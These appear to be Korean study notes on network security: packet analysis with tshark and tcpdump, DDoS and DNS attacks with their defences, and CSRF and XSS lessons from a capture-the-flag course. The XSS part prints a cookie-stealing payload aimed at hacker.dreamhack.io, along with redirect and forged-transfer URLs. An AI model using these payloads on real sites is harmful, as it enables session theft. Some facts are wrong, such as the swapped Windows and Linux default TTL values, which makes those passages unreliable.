패킷 캡처: 네트워크 트래픽을 캡처하여 피캡 파일로 저장합니다. 이때 각 패킷의 수신 시각이 타임스탬프로 기록됩니다.
타임스탬프 추출: 피캡 파일에서 각 패킷의 타임스탬프를 추출합니다. 이를 위해 Wireshark와 같은 패킷 분석 도구를 사용할 수 있습니다.
타임스탬프 저장: 추출한 타임스탬프를 각 패킷에 대응하여 별도의 파일이나 데이터베이스에 저장할 수 있습니다. 이 데이터는 나중에 패킷 분석 시 유용하게 활용될 수 있습니다.
분석: 타임스탬프 정보를 활용하여 패킷의 전송 시간, 지연 시간, 패킷 손실 등을 분석할 수 있습니다.
1. 싱크홀(Sinkhole) 네트워크 보안에서 싱크홀은 악성 트래픽을 특정 서버로 유도하여 분석하거나 차단하는 기술입니다. 이를 통해 공격을 감지하고 방어할 수 있습니다.
2. 패킷에서 존을 바라보는 이유 존(Zone): 패킷의 특정 필드에서 "존" 정보를 확인하여 해당 패킷이 싱크홀과 관련이 있는지 판단할 수 있습니다. 이 정보는 패킷의 출처나 목적지를 분석하는 데 유용합니다.
3. IP TTL (Time to Live) TTL 개념: TTL 값은 패킷이 네트워크에서 얼마나 오래 살아남을 수 있는지를 나타냅니다. 각 라우터를 통과할 때마다 TTL 값이 감소합니다. 윈도우 vs 리눅스: 윈도우: 기본 TTL 값은 64입니다. 리눅스: 기본 TTL 값은 127입니다. 마지막 0이 될 때: TTL 값이 0이 되면 패킷은 폐기됩니다. 따라서 TTL 값을 통해 패킷의 경로를 추적할 수 있습니다.
4. 3-Way Handshake 정의: TCP 연결을 설정하기 위한 과정으로, 다음과 같은 단계로 이루어집니다: SYN: 클라이언트가 서버에 연결 요청을 보냅니다. SYN-ACK: 서버가 클라이언트의 요청을 수락하고 응답합니다. ACK: 클라이언트가 서버의 응답을 확인합니다. 에크(ACK): 이 단계에서 클라이언트와 서버 간의 연결이 완전히 설정됩니다.
5. HTTP Request 푸쉬(PUSH): 클라이언트가 서버에 데이터를 전송할 때 사용됩니다. 이때 HTTP 요청이 발생합니다.
6. DNS TTL 정의: DNS TTL은 캐시된 DNS 레코드가 얼마나 오랫동안 유지될지를 결정합니다. 이 값이 만료되면 DNS 서버는 해당 정보를 새로 요청해야 합니다.
7. 기타 용어 핀(PING): 네트워크 연결을 테스트하기 위해 ICMP 프로토콜을 사용하는 명령어입니다. 네트워크의 응답 시간을 측정하는 데 사용됩니다. 신(SYN): TCP 연결 요청을 나타내는 플래그입니다. 리셋(RST): TCP 연결을 강제로 종료할 때 사용되는 플래그입니다. 에크(ACK): 데이터가 성공적으로 수신되었음을 확인하는 플래그입니다.
DDOS
방어자 입장에서 당할 수 잇는 공격 3가지
대역폭 소진 공격 (100g 라우터에 200g들어오면 null routing 이라고 버림 --> 이는 서비스의 가용성을 저하시킵니다.)
부분차단
70G공격이 100g router에 들어오면 라우터에서 차단을 하고 쓰레기통으로 버리고 남은 통신은 정상적으로 전달이 된다.
대역폭소진공격에서 가용대역폭을 초과하는 공격이 들어오게 될 경우, 예를들어 20g공간에 30g가 들어오게 되면 라우터는 이 과부하를 처리할 수 없어 일부 트래픽을 차단하게 됩니다.
방어방법
대역폭소진공격은 가용성을 가지고 있는 상단에서만 막을 수 있다. // 우리나라 관문체계에서는 대역폭 소지기반 대응이 다 들어가있다.
HTTP기반 공격 ( 클라이언트 ↔ 서버 관계에서)
HTTP 기반 공격은 클라이언트와 서버 간의 연결을 악용하여 서버의 자원을 소진시키거나 서비스 중단을 유발하는 공격
서버는 한 번에 처리할 수 있는 연결 수에 한계가 있습니다. 예를 들어, 초당 1,000번의 연결을 처리할 수 있는 서버가 있다고 가정할 때, 클라이언트가 초당 1,000번의 요청을 보내면 서버의 연결이 소진됩니다.
SYN Flood 공격:
공격자가 지속적으로 SYN 패킷을 전송하면 서버는 각 연결 요청에 대해 "SYN-ACK" 응답을 보냅니다. 이 과정에서 서버는 연결을 위한 리소스를 할당하게 되며, 이로 인해 서버의 자원이 고갈됩니다. 결국, 정상적인 클라이언트의 연결 요청을 처리할 수 없게 됩니다.
DDoS 공격:
공격자가 여러 클라이언트를 이용해 초당 하나씩 요청을 보내면, 서버의 연결 수를 소진시키는 DDoS(분산 서비스 거부) 공격이 발생할 수 있습니다. 이 경우, 공격자는 여러 IP 주소를 사용하여 서버의 자원을 고갈시키므로 방어가 더욱 어려워집니다.
방어방법
시그니처 기반 방어:
공격 패턴에 대한 시그니처를 설정하고, 이를 기반으로 비정상적인 트래픽을 필터링합니다. 이러한 방법은 자동으로 공격을 탐지하고 차단할 수 있는 효과적인 방법입니다.
대피소 동작:
대피소와 같은 시스템을 구축하여 공격이 발생했을 때 자동으로 대처할 수 있는 체계를 마련합니다. 이 체계는 공격을 감지하고, 필요한 경우 트래픽을 차단하거나 우회시킵니다.
프록시 및 DNS 변경:
방어를 위해 프록시 서버를 사용하고 DNS를 변경하는 방법이 있습니다. 이를 통해 공격 트래픽을 다른 서버로 우회시키고, 공격자의 IP 주소가 직접 서버에 도달하지 않도록 할 수 있습니다.
재방문 횟수 카운트:
공격자의 재방문 횟수를 카운트하여, 일정 횟수 이상 접속하는 IP 주소를 차단합니다. 이를 통해 공격자를 식별하고 차단할 수 있습니다.
국지적 DDoS 대역폭 소진 공격
DDoS 공격은 여러 대의 컴퓨터(봇넷)를 이용하여 특정 서버나 네트워크를 대상으로 대량의 트래픽을 발생시켜 서비스의 정상적인 운영을 방해하는 공격입니다. 국지적 DDoS 공격은 특정 지역이나 특정 네트워크에 집중된 공격을 의미합니다. 대역폭 소진:
100메가의 대역폭을 가진 네트워크에서는 공격이 명확하게 보이지만, 백지망(예: 서버의 대역폭이 매우 높은 경우)에서는 상대적으로 덜 보일 수 있습니다.
패킷 흐름: 공격자가 자신의 IP 주소(a.b.c.d)를 소스 IP로 설정하고, 피해자의 IP 주소(5.4.3.2)를 목표로 하여 DNS 쿼리를 보냅니다. 이때 패킷의 소스 포트와 목적지 포트가 53번(DNS 포트)인 경우, 해당 트래픽이 의심스러운 것으로 간주되어야 합니다.
*소스 포트가 53번인 경우, 이는 DNS 서버가 클라이언트로부터의 쿼리에 대한 응답을 보내고 있다는 것을 의미합니다. 그러나 공격자가 자신의 IP 주소를 위조하여 이러한 패킷을 전송하는 경우, 정상적인 DNS 쿼리와는 다른 비정상적인 트래픽 패턴이 발생할 수 있습니다.
방어 방법
트래픽 모니터링: 비정상적인 트래픽 패턴을 모니터링하고, 특히 DNS 쿼리에 대한 비정상적인 요청을 감지합니다. 소스 포트와 목적지 포트가 53번인 경우, 이를 즉시 차단하거나 추가 검토를 요청할 수 있습니다.
오픈 DNS 서버 제한: 공개 DNS 서버가 악용되지 않도록 설정을 강화합니다. 오픈 리커시브 DNS 서버의 사용을 최소화하고, 필요한 경우 IP 주소 필터링을 적용하여 접근을 제한합니다. 대역폭 관리:
네트워크의 대역폭을 관리하고, DDoS 공격 발생 시 자동으로 트래픽을 차단하거나 우회시키는 시스템을 구축합니다.
신속한 대응 체계 구축: 공격 발생 시 신속하게 대응할 수 있는 체계를 마련합니다. 예를 들어, 특정 패턴의 트래픽을 감지했을 때 자동으로 차단하거나 경고를 발생시키는 시스템이 필요합니다.
| awk -F"|" '{print $0}': awk를 사용하여 각 행을 파이프(|)로 구분된 형식으로 처리합니다. 여기서 {print $0}는 현재 행 전체를 출력하는 명령입니다. 사실상 이 부분은 생략 가능하며, 단순히 cat의 출력을 그대로 전달하는 역할을 합니다.
| grep -v *: grep 명령어는 특정 패턴을 포함하거나 제외하여 데이터를 필터링합니다. -v 옵션은 "invert match"를 의미하며, 지정한 패턴이 포함되지 않는 행만 출력합니다. 이 경우 * 패턴이 포함되지 않은 행을 필터링합니다.
| awk '$1==prv{sum+=2; next}{print prv "\t" sum; prv=$1; sum=$2}': 첫 번째 필드($1)와 이전 필드(prv)가 같으면 sum을 2 증가시키고, 그렇지 않으면 현재의 prv와 sum을 출력합니다. 이후 prv를 현재의 첫 번째 필드로 업데이트하고 sum은 두 번째 필드($2)로 초기화합니다.
| sort -rnk 2: 두 번째 필드를 기준으로 내림차순으로 정렬합니다. -r 옵션은 내림차순 정렬을 의미하고, -n은 숫자로 정렬하라는 뜻입니다.
| awk '{print NR "\t" $0}': 최종 결과에 행 번호를 추가하여 출력합니다. NR은 현재 레코드 번호를 나타냅니다.
이 명령어는 ipv4.log 파일에서 특정 필드를 추출하고, 해당 데이터를 정렬 및 집계한 후, 최종적으로 각 행에 번호를 붙여 출력합니다.
dig ns | grep root-server.net | awk '{print $5}'
dig ns: dig 명령어는 DNS 정보를 조회하는 유틸리티입니다. ns는 네임서버 정보를 요청하는 옵션입니다. 만약 특정 도메인을 조회하고 싶다면 dig ns example.com과 같이 사용할 수 있습니다.
| grep root-server.net: grep 명령어를 사용하여 root-server.net이라는 문자열이 포함된 행만 필터링합니다. 이 부분은 dig 명령어의 출력 중에서 특정 네임서버 관련 정보를 찾는 역할을 합니다.
| awk '{print $5}': awk를 사용하여 각 행에서 다섯 번째 필드를 출력합니다.일반적으로 네임서버의 IP 주소가 다섯 번째 필드에 위치합니다.
cat root_dns.domain | while read line; do echo "$line: $(dig "$line" +short)"; done
cat root_dns.domain: root_dns.domain 파일의 내용을 출력합니다.
| while read line; do ...; done: 파이프를 통해 cat 명령어의 출력을 while 루프에 전달하여 각 행을 line 변수에 저장하고 처리합니다.
echo "$line: $(dig "$line" +short)": echo 명령어를 사용하여 line의 내용과 함께 dig 명령어의 결과를 출력합니다.
dig "$line" +short는 각 행(도메인 이름)에 대해 간단한 DNS 정보를 조회합니다. +short 옵션은 출력 결과를 간단하게 보여줍니다.
**참고자료
$NF는 awk에서 사용되는 특수 변수로, 현재 레코드(행)의 마지막 필드를 나타냅니다. NF는 "Number of Fields"의 약자로, 현재 레코드에서 필드의 총 개수를 의미합니다.
| sed 's/ /->/g': sed를 사용하여 출력된 각 줄의 공백을 ->로 변경합니다. s/ /->/g는 각 줄에서 모든 공백을 찾아서 ->로 대체하겠다는 의미입니다.
> cmplx.dot: 최종 결과를 cmplx.dot 파일로 저장합니다.
emacs cmplx.dot
emacs cmplx.dot 명령어는 Emacs 편집기를 사용하여 cmplx.dot 파일을 열겠다는 의미입니다. Emacs는 강력한 텍스트 편집기로, 다양한 프로그래밍 언어와 파일 형식을 지원합니다.
Emacs 편집기를 통해 dot 파일을 열은 후 다이어그래프를 만들기 위해 위 아래로 digraph { ... } 을 작성합니다.
...
cat cmplx.dot | dot -Tpng -o c.png
cat cmplx.dot: cmplx.dot 파일의 내용을 출력합니다. 이 파일은 Graphviz에서 사용할 수 있는 DOT 형식의 그래프 정의를 포함하고 있어야 합니다.
| dot -Tpng -o c.png: | 기호는 파이프를 의미하며, 앞선 명령어(cat)의 출력을 다음 명령어(dot)의 입력으로 전달합니다. dot은 Graphviz의 도구로, DOT 언어로 작성된 그래프를 시각화하는 데 사용됩니다.
-Tpng 옵션은 출력 형식을 PNG 이미지로 지정합니다.
-o c.png 옵션은 출력 파일의 이름을 c.png로 지정합니다.
이후 [New SFTP window 클릭]
** 내가 위치한 다이렉토리가 이상해서 파일이 보이지 않을때
copy 파일명 ~/ -> cp c.png ~/
**참고자료
중복된 선을 없애고 깔끔하게 프린트하는 법
tar -xzvf assn3.tar.gz
tar: tar는 Unix 및 Linux 시스템에서 파일을 아카이브하고 압축하는 데 사용되는 명령어입니다. -x: 이 옵션은 압축을 해제(extract)하라는 의미입니다. -z: 이 옵션은 gzip 압축을 해제하라는 의미입니다. tar.gz 파일은 gzip으로 압축된 tar 아카이브입니다. -v: 이 옵션은 verbose 모드로, 압축 해제 과정에서 처리되는 파일의 이름을 화면에 출력합니다. -f: 이 옵션은 뒤에 오는 파일 이름이 tar 아카이브 파일임을 지정합니다.
tshark -nnr assnq1_dns_sinkhole.pcap
tshark: tshark는 Wireshark의 명령줄 기반 패킷 분석 도구입니다. 네트워크 트래픽을 캡처하고 분석하는 데 사용됩니다. -nn: 이 옵션은 네트워크 주소를 해석하지 않고 숫자 형식으로 출력하라는 의미입니다. 즉, IP 주소나 포트 번호를 숫자로 그대로 보여줍니다. -r: 이 옵션은 지정된 파일을 읽는(read) 모드로 설정합니다. 여기서는 assnq_dns.sinkhole.pcap 파일을 읽겠다는 의미입니다.
tcpdump -nnr assnq1_dns_sinkhole.pcap
**
tcpdump 패킷 분석기 (헤더와 프로토콜을 분리하지 않음)
wireshark 프로토콜 분석기 (훨씬 강력) → 그래서 프로토콜을 분석할떄는 Tshark 를 쓰는 것이 좋다.
tshark_ttl.sh: 이 부분은 실행할 스크립트의 이름입니다. 스크립트의 내용에 따라 다양한 분석 작업을 수행할 수 있습니다. assn_q2.pcap: 분석할 패킷 캡처 파일의 이름입니다. .pcap 확장자는 패킷 캡처 파일 형식을 나타냅니다. 이 명령어는 tshark_ttl(or http).sh 스크립트를 실행하고, assn_q2.pcap 파일을 인자로 전달하여 스크립트가 이 파일을 처리하도록 합니다.
ngrep -qI assn_q3.pcap
주어진 명령어는 ngrep를 사용하여 assn_q3.pcap 파일의 내용을 분석하는 것입니다.
ngrep: ngrep는 네트워크 패킷을 필터링하고 분석하는 데 사용하는 도구입니다. 일반적으로 패킷을 실시간으로 캡처하고 특정 패턴을 찾아 출력합니다. -q: 이 옵션은 출력 시 "조용히" 작동하도록 설정합니다. 즉, 불필요한 정보 없이 패턴이 매치되는 데이터만 출력합니다. -I: 이 옵션은 입력 파일을 바이너리 형식으로 읽어들이겠다는 의미입니다. ngrep는 기본적으로 실시간 패킷 캡처를 위해 설계되었지만, 이 옵션을 사용하면 파일에서도 데이터를 읽을 수 있습니다. assn_q3.pcap: 분석할 패킷 캡처 파일의 이름입니다. .pcap 확장자는 패킷 캡처 파일 형식을 나타냅니다.
tshark: Wireshark의 명령줄 기반 패킷 분석 도구입니다. -nn: 네트워크 주소를 해석하지 않고 숫자 형식으로 출력합니다. 이는 IP 주소나 포트 번호를 숫자로 그대로 보여주기 위한 옵션입니다. -r: 지정된 파일을 읽는 모드로 설정합니다. 여기서는 assn_q4.pcap 파일을 읽습니다. tls.handshake.extensions_server_name: TLS 핸드셰이크 과정에서 서버 이름 확장(Server Name Indication, SNI)을 추출하는 필드입니다. 이 필드는 클라이언트가 서버에 연결할 때 어떤 도메인 이름을 요청하는지를 나타냅니다.
이 명령어는 assn_q4.pcap 파일을 읽고, 각 TLS 핸드셰이크 패킷에서 서버 이름 확장 정보를 추출하여 출력합니다.
*TLS(Transport Layer Security)는 인터넷 상에서 데이터를 안전하게 전송하기 위한 암호화 프로토콜
전체 DNS 주소(칼럼 5번)를 불러온다.
총 DNS 서버가 몇개인지 확인
12061개의 DNS 서버를 사용되었음.
DNS가 실제 DNS인지 확인하기 위해서는 kisa.or.kr을 집어 넣는다 만약 답변 해주면 open recursive 이다.
211292: 번호: 이 항목의 고유 식별 번호입니다. 각 로그 항목은 고유한 번호로 식별됩니다. 4.997539: 시간: 쿼리가 발생한 시간입니다. 소수점 숫자로 표현되며, 4초와 997539 밀리초를 의미합니다. 1.255.41.90: 출발지 IP 주소: 이 DNS 쿼리를 보낸 클라이언트의 IP 주소입니다. 즉, 요청을 보낸 사용자 또는 장치의 주소입니다. ->: 화살표: 요청이 보낸 방향을 나타내며, 클라이언트에서 서버로의 흐름을 보여줍니다. 203.234.152.20: 목적지 IP 주소: 이 쿼리에 응답한 DNS 서버의 IP 주소입니다. 클라이언트가 이 서버에 요청을 보냈습니다. DNS: 프로토콜: 사용된 프로토콜을 나타냅니다. 이 경우 DNS(Domain Name System)를 의미합니다. 66: 패킷 길이: 전송된 패킷의 크기입니다. 여기서는 66 바이트로 표시됩니다. Standardquery: 쿼리 유형: DNS 쿼리의 유형을 나타냅니다. 이 경우 표준 쿼리임을 의미합니다. Oxee85: 쿼리 ID: DNS 쿼리를 식별하기 위한 고유 ID입니다. 이 ID는 클라이언트와 서버 간의 통신을 추적하는 데 사용됩니다. A: 쿼리 레코드 유형: 이 쿼리가 A 레코드를 요청하고 있음을 나타냅니다. A 레코드는 도메인 이름을 IPv4 주소로 변환하는 데 사용됩니다. yna.kr: 쿼리 도메인: 클라이언트가 요청한 도메인 이름입니다. 여기서는 yna.kr이라는 도메인에 대한 정보를 요청하고 있습니다.
| grep /xampp/img/flash.gif: 압축 해제된 데이터에서 /xampp/img/flash.gif라는 패턴이 포함된 행만 필터링하여 출력합니다. 즉, 이 경로에 대한 요청을 찾습니다.
| awk '{print $1}': 필터링된 결과에서 첫 번째 필드(일반적으로 IP 주소)를 추출하여 출력합니다.
| sort -u: 추출된 IP 주소를 정렬하고, 중복된 값을 제거하여 고유한 IP 주소만 남깁니다.
| wc -l: 고유한 IP 주소의 수를 계산하여 출력합니다.
bot.ip - ip를 모으는 방법
Layer 2 통신 방식: Layer 2에서는 MAC 주소를 통해 통신합니다. 신뢰성: MAC 주소는 모두 다르기 때문에 서로 간의 신뢰관계가 형성됩니다. 공격 방식:
ARP (Address Resolution Protocol)**는 네트워크에서 IP 주소를 MAC 주소로 변환하는 프로토콜입니다. 주로 IPv4 네트워크에서 사용되며, 데이터 링크 계층에서 호스트 간의 통신을 가능하게 합니다.
ARP Spoofing: MAC 주소를 기반으로 하는 공격으로, 네트워크에서 ARP를 조작하여 데이터 전송을 가로채는 방식입니다. Man-in-the-Middle Attack: 공격자가 게이트웨이 주소를 변경하여 패킷에 URL을 삽입하고, 이를 통해 데이터를 가로채거나 변조합니다. Layer 3 BGP (Border Gateway Protocol) Hijacking: 네트워크 경로를 악의적으로 변경하여 트래픽을 가로채는 공격입니다. DNS (Domain Name System): TTL (Time to Live): TTL이 짧으면 DNS 질의에 부하가 걸립니다. TTL이 길면 DNS 질의가 줄어들어 서버에 가는 부하가 적습니다. DNS Sinkhole: 악성 트래픽을 차단하기 위해 DNS 요청을 조작하여 가짜 IP 주소로 유도하는 기술입니다. BGP 하이재킹 탐지 BGP 하이재킹을 탐지하기 위해서는 자신이 소유한 prefix보다 하나 작은 prefix를 모니터링해야 합니다.
아래 코드는 Javascript로 작성된 스크립트의 예시입니다. 새로운 창을 띄우고, 현재 창의 주소를 옮기는 등의 행위가 가능합니다.
/* 새 창 띄우기 */
window.open('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');
/* 현재 창 주소 옮기기 */
location.href = 'http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337';
location.replace('http://bank.dreamhack.io/sendmoney?to=Dreamhack&amount=1337');
XSS와 CSRF는 스크립트를 웹 페이지에 작성해 공격한다는 점에서 매우 유사합니다.
두 개의 취약점은 모두 클라이언트를 대상으로 하는 공격이며, 이용자가 악성 스크립트가 포함된 페이지에 접속하도록 유도해야 합니다
//차이점
- XSS는 인증 정보인 세션 및 쿠키 탈취를 목적으로 하는 공격이며, 공격할 사이트의 오리진에서 스크립트를 실행시킵니다.
- CSRF는 이용자가 임의 페이지에 HTTP 요청을 보내는 것을 목적으로 하는 공격입니다. 또한, 공격자는 악성 스크립트가 포함된 페이지에 접근한 이용자의 권한으로 웹 서비스의 임의 기능을 실행할 수 있습니다.
키워드
Cross Site Request Forgery (CSRF): 사이트 간 요청 위조. 이용자가 자신의 의지와는 무관하게 공격자가 의도한 행위를 특정 웹사이트에 요청하게 만드는 공격.
Q1. 서버에서 이용자를 식별하기 위해 쿠키를 사용하고 있어야 CSRF 취약점으로 공격할 수 있다.
O
Q2. 브라우저는 CSRF 취약점을 방지하기 위한 보안 메커니즘을 제공한다.
O
Q3. CSRF 공격이 불가능할 때 XSS 공격도 불가능하다.
X
Q4. 서버에서 HTTP의 GET 메소드가 아닌 POST 메소드로 데이터를 받으면 CSRF에 안전하다.
Cross Site Scripting (XSS)는 클라이언트사이드의 취약점 중 하나입니다.
공격자가 웹 리소스에 악성 스크립트를 삽입해서 이용자의 웹 브라우저에 해당 스크립트를 실행할 수 있습니다.
예를 들어 XSS 취약점이 존재하는 사이트 내에 오리진 권한으로 악성 스크립트를 삽입한다면, 이용자가 악성 스크립트가 포함된 페이지를 방문하면 공격자가 임의로 삽입한 스크립트가 실행되어 쿠키 및 세션을 탈취할 수 있습니다.
XSS공격은 SOP 보안 정책이 등장하면서 서로 다른 오리진에서는 정보를 읽는 행위가 이전에 비해 힘들어졌지만, 우회하는 기술들을 이용한 XSS공격은 계속 지속되고 있습니다.
XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생합니다.
XSS 공격에는 대표적으로 4가지 종류가 있습니다.
종류
설명
Stored XSS
XSS에 사용되는악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS
Reflected XSS
XSS에 사용되는악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS
DOM-based XSS
XSS에 사용되는악성 스크립트가 URL Fragment에 삽입되는 XSS
Fragment는 서버 요청/응답 에 포함되지 않습니다.
Universal XSS
클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS
자바스크립트를 이용한 XSS 공격 코드 예시
<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>
쿠키 및 세션 탈취 공격 코드
<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>
페이지 변조 공격 코드
<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing";
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>
위치 이동 공격 코드
Stored XSS
서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생
대표적으로 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식
Reflected XSS
서버가 악성 스크립트가 담긴 요청을 출력할 때 발생
대표적으로 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식
일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생
Reflected XSS는 Stored XSS와는 다르게 URL과 같은 이용자의 요청에 의해 발생
따라서 공격을 위해서는 다른 이용자를 악성 스크립트가 포함된 링크에 접속하도록 유도해야 합니다. 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로Click Jacking또는Open Redirect등 다른 취약점과 연계하여 사용합니다.
쿠키 탈취
memo 페이지 사용
flag엔드포인트에서 다음과 같은 익스플로잇 코드를 입력하면,memo엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있습니다.
외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있습니다. 외부에서 접근 가능한 웹 서버가 없다면 아래 첨부한 드림핵에서 제공하는 서비스를 사용할 수 있습니다. 해당 서비스에서 제공하는 Request Bin 기능은 이용자의 접속 기록을 저장하기 때문에 해당 정보를 확인할 수 있습니다. Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장합니다.
flag기능에서 다음과 같은 익스플로잇 코드를 입력하면,아래와 같이 접속 기록에 포함된FLAG를 확인할 수 있습니다.